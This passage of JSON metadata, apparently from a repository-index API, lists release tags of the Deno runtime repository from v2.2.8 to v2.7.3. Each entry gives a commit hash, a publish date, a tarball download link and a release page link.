86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/